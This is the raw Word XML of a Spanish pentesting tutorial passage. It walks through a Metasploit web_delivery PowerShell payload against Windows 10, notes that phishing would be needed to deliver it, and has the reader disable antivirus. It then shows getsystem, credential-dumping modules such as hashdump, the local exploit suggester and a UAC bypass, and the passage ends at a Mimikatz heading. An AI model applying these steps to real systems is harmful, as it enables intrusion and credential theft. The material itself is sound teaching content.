        <w:t>Esta vez nos centraremos en un Windows 10 con la vulnerabilidad web_delivery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E6043C" w14:textId="6BD1FA61" w:rsidR="008F189C" w:rsidRPr="008B25C9" w:rsidRDefault="008F189C" w:rsidP="008F189C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="008F189C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="717F3E84" wp14:editId="38C66A9D">
            <wp:extent cx="5400040" cy="162560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1625600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4A0B37" w14:textId="05EDAF81" w:rsidR="00E14E9B" w:rsidRDefault="00E14E9B" w:rsidP="008F189C">
      <w:r>
        <w:t>Este exploit nos genera directamente el payload que nosotros debemos ejecutar en la máquina de destino. Lo primero es seleccionar que tipo de objetivo tenemos, para ello, seleccionamos como target un Powershell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A72A9E1" w14:textId="5B906E6F" w:rsidR="00E14E9B" w:rsidRDefault="00E14E9B" w:rsidP="00E14E9B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00E14E9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08F28A8B" wp14:editId="4D088984">
            <wp:extent cx="2079906" cy="1402080"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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091178" cy="1409678"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE97E3A" w14:textId="6F14064A" w:rsidR="00E14E9B" w:rsidRDefault="00E14E9B" w:rsidP="00E14E9B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Seleccionamos un payload, en este caso uno compatible sería:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E423233" w14:textId="27A68971" w:rsidR="00E14E9B" w:rsidRDefault="00E14E9B" w:rsidP="00E14E9B">
      <w:r w:rsidRPr="00E14E9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="449FA1B1" wp14:editId="5FC1C4C4">
            <wp:extent cx="5400040" cy="239395"/>
            <wp:effectExtent l="0" t="0" r="0" b="825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239395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF37FA7" w14:textId="40B71E87" w:rsidR="00E14E9B" w:rsidRDefault="00CB6BBB" w:rsidP="00E14E9B">
      <w:r>
        <w:t>No nos olvidemos poner nuestro LHOST y con esto estaría listo para el exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F22E2C4" w14:textId="487095FC" w:rsidR="00CB6BBB" w:rsidRDefault="00CB6BBB" w:rsidP="00E14E9B">
      <w:r w:rsidRPr="00CB6BBB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3277DDBD" wp14:editId="3B826E9B">
            <wp:extent cx="4130398" cy="365792"/>
            <wp:effectExtent l="0" t="0" r="381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30398" cy="365792"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2236C8E1" w14:textId="3EDCD67F" w:rsidR="00CB6BBB" w:rsidRDefault="00CB6BBB" w:rsidP="00E14E9B">
      <w:r>
        <w:t>Nos devuelve un comando powershell para que el cliente lo ejecute desde la máquina objetivo, así que haría falta algo de phishing por ejemplo para poder atacarla</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF66921" w14:textId="1669BBF3" w:rsidR="00CB6BBB" w:rsidRDefault="00CB6BBB" w:rsidP="00E14E9B">
      <w:r w:rsidRPr="00CB6BBB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="715C0675" wp14:editId="760567EB">
            <wp:extent cx="5400040" cy="1030605"/>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1030605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="435F3308" w14:textId="2498CFB3" w:rsidR="00B865CE" w:rsidRDefault="00CB6BBB" w:rsidP="00E14E9B">
      <w:r>
        <w:t>Al ejecutarlo en el powershell de la máquina objetivo, se cerrará automáticamente su powershell</w:t>
      </w:r>
      <w:r w:rsidR="00B865CE">
        <w:t>, es necesario desactivar el Antivirus de tiempo real:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1564DD19" w14:textId="48A703FA" w:rsidR="00B865CE" w:rsidRDefault="00B865CE"/>
    <w:p w14:paraId="4458FAC2" w14:textId="6E90A4F4" w:rsidR="00CB6BBB" w:rsidRDefault="00B865CE" w:rsidP="00E14E9B">
      <w:r w:rsidRPr="00B865CE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E1514BC" wp14:editId="49C93FF2">
            <wp:extent cx="4740051" cy="2103302"/>
            <wp:effectExtent l="0" t="0" r="381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40051" cy="2103302"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EDE068" w14:textId="77777777" w:rsidR="00CB6BBB" w:rsidRDefault="00CB6BBB" w:rsidP="00E14E9B"/>
    <w:p w14:paraId="6934406E" w14:textId="222E1F45" w:rsidR="00CB6BBB" w:rsidRDefault="00B57F70" w:rsidP="00E14E9B">
      <w:r w:rsidRPr="00B57F70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28A1AF42" wp14:editId="564EA573">
            <wp:extent cx="5400040" cy="1576705"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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1576705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F01264" w14:textId="77777777" w:rsidR="00B57F70" w:rsidRDefault="00B57F70" w:rsidP="00E14E9B"/>
    <w:p w14:paraId="09360E70" w14:textId="77777777" w:rsidR="00B57F70" w:rsidRDefault="00B57F70" w:rsidP="00E14E9B"/>
    <w:p w14:paraId="6AF826ED" w14:textId="77777777" w:rsidR="00B57F70" w:rsidRDefault="00B57F70" w:rsidP="00E14E9B"/>
    <w:p w14:paraId="5E726285" w14:textId="79D49229" w:rsidR="00B57F70" w:rsidRDefault="00B57F70" w:rsidP="00E14E9B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Podemos entrar a esa sesión con:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F47A10" w14:textId="49DFA9FF" w:rsidR="00B57F70" w:rsidRDefault="00B57F70" w:rsidP="00B57F70">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B57F70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sessions 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24897EC5" w14:textId="4CFA5200" w:rsidR="00B57F70" w:rsidRDefault="00B57F70" w:rsidP="00B57F70">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B57F70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53322C32" wp14:editId="46D664A3">
            <wp:extent cx="4625741" cy="1653683"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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25741" cy="1653683"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A28A63D" w14:textId="67521F88" w:rsidR="00B57F70" w:rsidRDefault="00B57F70" w:rsidP="0058559C"/>
    <w:p w14:paraId="382532CC" w14:textId="42AFD734" w:rsidR="00A96EBF" w:rsidRDefault="00A96EBF" w:rsidP="0058559C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Una vez aquí podemos hacer uso de</w:t>
      </w:r>
      <w:r w:rsidRPr="00A96EBF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> getsystem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDFB7DC" w14:textId="0DFF141E" w:rsidR="00A96EBF" w:rsidRDefault="00A96EBF" w:rsidP="00A96EBF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A96EBF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BB113C0" wp14:editId="334F8DC9">
            <wp:extent cx="4892464" cy="1066892"/>
            <wp:effectExtent l="0" t="0" r="381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92464" cy="1066892"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB369F1" w14:textId="510F53E0" w:rsidR="00A96EBF" w:rsidRDefault="00BB4B53" w:rsidP="00A96EBF">
      <w:r>
        <w:t>Como podemos comprobar, podemos hacer uso de algunos módulos de metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541197AF" w14:textId="2AD89F35" w:rsidR="00BB4B53" w:rsidRDefault="00BB4B53" w:rsidP="00BB4B53">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BB4B53">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39758F0A" wp14:editId="6DFD55FC">
            <wp:extent cx="3330229" cy="655377"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="15213119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11984" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3330229" cy="655377"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="53607511" w14:textId="682F512F" w:rsidR="00BB4B53" w:rsidRPr="003B7968" w:rsidRDefault="00BB4B53" w:rsidP="003B7968">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7968">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Siempre es interesante ver si la máquina comprometida es una Máquina Virtual, por si se trata de un Honey Pot, una trampa que puede ser colocada para que hagamos pentesting en ella y recopile información nuestra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4A5595" w14:textId="7237F389" w:rsidR="00BB4B53" w:rsidRDefault="00BB4B53" w:rsidP="00A96EBF">
      <w:r>
        <w:t>Algunos módulos interesantes de Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6786CA40" w14:textId="55865711" w:rsidR="00BB4B53" w:rsidRDefault="003B7968" w:rsidP="003B7968">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>credentials/credential_collector (necesita privilegios): para acceder a credenciales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38835CCD" w14:textId="4C178688" w:rsidR="003B7968" w:rsidRDefault="003B7968" w:rsidP="003B7968">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>enum_shares: para ver las carpetas compartidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D90F7EF" w14:textId="68BAD570" w:rsidR="003B7968" w:rsidRDefault="003B7968" w:rsidP="003B7968">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>hasdump: Volcar hash de credenciales en memoria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBE233" w14:textId="629B29E3" w:rsidR="00BB4B53" w:rsidRDefault="00BB4B53" w:rsidP="00A96EBF">
      <w:r w:rsidRPr="00BB4B53">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="538B9FC6" wp14:editId="124B6A41">
            <wp:extent cx="5400040" cy="627380"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="2322506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50665" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId118"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="627380"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A2E17F" w14:textId="1FC59325" w:rsidR="003B7968" w:rsidRDefault="003B7968" w:rsidP="00A96EBF">
      <w:r>
        <w:t>Al igual que en con Linux, también contamos con el recomendador de exploits de post-explotación</w:t>
      </w:r>
      <w:r w:rsidR="00097312">
        <w:t xml:space="preserve">, en este caso, nos recomendará </w:t>
      </w:r>
      <w:r w:rsidR="00097312" w:rsidRPr="00097312">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>UAC Bypass</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B12A9C9" w14:textId="391A7C9A" w:rsidR="003B7968" w:rsidRDefault="003B7968" w:rsidP="003B7968">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7968">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>run post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482AF151" w14:textId="294512B3" w:rsidR="003B7968" w:rsidRDefault="003B7968" w:rsidP="003B7968">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7968">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>¡Puede usarse directamente desde el meterpreter!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EB33DE" w14:textId="2F31B97F" w:rsidR="003B7968" w:rsidRDefault="003B7968" w:rsidP="003B7968">
      <w:pPr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A5FB8E" w14:textId="4F9A1604" w:rsidR="003B7968" w:rsidRDefault="003B7968" w:rsidP="003B7968">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7968">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>UAC Bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7968">
        <w:t>Técnica de post-explotación que nos permite elevar privilegios</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7968">
        <w:t>en Windows en determinadas situaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC0ED6C" w14:textId="431028A9" w:rsidR="003B7968" w:rsidRPr="003B7968" w:rsidRDefault="003B7968" w:rsidP="003B7968">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7968">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>UAC (User Account Control) es el causable de las pestaña que avisa que tienes que aceptar permisos de Administrador. Esto permite que el usuario eleve permisos sin siquiera tener que poner la contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF4A0ED" w14:textId="56F13FAB" w:rsidR="003B7968" w:rsidRDefault="003B7968" w:rsidP="003B7968">
      <w:r>
        <w:t>Entoces el UAC Bypass, consiste en aprovechar este hecho para cargar otros programas, con este autoelevador de privilegios.</w:t>
      </w:r>
      <w:r w:rsidR="00097312">
        <w:t xml:space="preserve"> Como vemos, como continuación del apartado anterior, esta máquina de ejemplo es vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0024740B" w14:textId="00C3E4B1" w:rsidR="00097312" w:rsidRDefault="00097312" w:rsidP="003B7968">
      <w:r w:rsidRPr="00097312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14EC3326" wp14:editId="3D304B42">
            <wp:extent cx="5400040" cy="1885950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1482985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85276" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId119"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1885950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7629193D" w14:textId="53CAA9F7" w:rsidR="00097312" w:rsidRDefault="00097312" w:rsidP="003B7968">
      <w:r>
        <w:t xml:space="preserve">Para seleccionarlo, recordamos que usamos </w:t>
      </w:r>
      <w:r w:rsidRPr="00097312">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidRPr="00097312">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en el exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6298E308" w14:textId="20E73BFA" w:rsidR="00097312" w:rsidRDefault="00097312" w:rsidP="003B7968">
      <w:r w:rsidRPr="00097312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65E18E4C" wp14:editId="4C7BA8BC">
            <wp:extent cx="5400040" cy="434340"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="138011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1587" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId120"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="434340"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F4B817" w14:textId="74F2B167" w:rsidR="00097312" w:rsidRDefault="00097312" w:rsidP="003B7968">
      <w:r>
        <w:t>Decidimos las opciones, IMPORTANTE cambiar el LPORT para que no interfiera con la sesión abierta actualmente</w:t>
      </w:r>
      <w:r w:rsidR="00AF0BB5">
        <w:t xml:space="preserve"> y colocar el LHOST bien y </w:t>
      </w:r>
      <w:r w:rsidR="00AF0BB5" w:rsidRPr="00AF0BB5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711CA1A9" w14:textId="746194F3" w:rsidR="00097312" w:rsidRDefault="00097312" w:rsidP="00097312">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00097312">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64B34017" wp14:editId="0A803AEF">
            <wp:extent cx="4974541" cy="3749040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="19927023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02346" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId121"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4996119" cy="3765302"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C1BF9" w14:textId="4BD3DC8E" w:rsidR="00097312" w:rsidRDefault="00AF0BB5" w:rsidP="00097312">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Como resultado</w:t>
      </w:r>
      <w:r w:rsidR="00646011">
        <w:t>, se arbirá una sesión en meterpreter</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2E0967" w14:textId="19C11B24" w:rsidR="00AF0BB5" w:rsidRDefault="00AF0BB5" w:rsidP="00097312">
      <w:r w:rsidRPr="00AF0BB5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2724E158" wp14:editId="5D6794D5">
            <wp:extent cx="5400040" cy="1139825"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="5835300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30022" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId122"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="1139825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="203AE89B" w14:textId="3B6A0C6C" w:rsidR="00646011" w:rsidRDefault="00646011" w:rsidP="00097312">
      <w:r>
        <w:t>Esta vez, sí podremos ejecutar esos valiosos módulos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6B6BAA" w14:textId="2FA3CF11" w:rsidR="00646011" w:rsidRDefault="00646011" w:rsidP="00097312">
      <w:r w:rsidRPr="00646011">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CEB690B" wp14:editId="065CC2A4">
            <wp:extent cx="5400040" cy="2375535"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1101070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70334" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId123"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2375535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4B8F93" w14:textId="58C063BB" w:rsidR="00646011" w:rsidRDefault="00646011" w:rsidP="00097312">
      <w:r w:rsidRPr="00646011">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16F487E2" wp14:editId="535E03B0">
            <wp:extent cx="5400040" cy="2218055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8113702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70293" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId124"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400040" cy="2218055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D49A7E1" w14:textId="3DBA44AC" w:rsidR="00051E9E" w:rsidRDefault="00051E9E" w:rsidP="00097312"/>
    <w:p w14:paraId="2DE93D8C" w14:textId="2443F881" w:rsidR="00051E9E" w:rsidRDefault="00051E9E" w:rsidP="00097312">
      <w:r w:rsidRPr="00051E9E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Mimikatz:</w:t>
      </w:r>
      <w:r w:rsidRPr="00051E9E">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
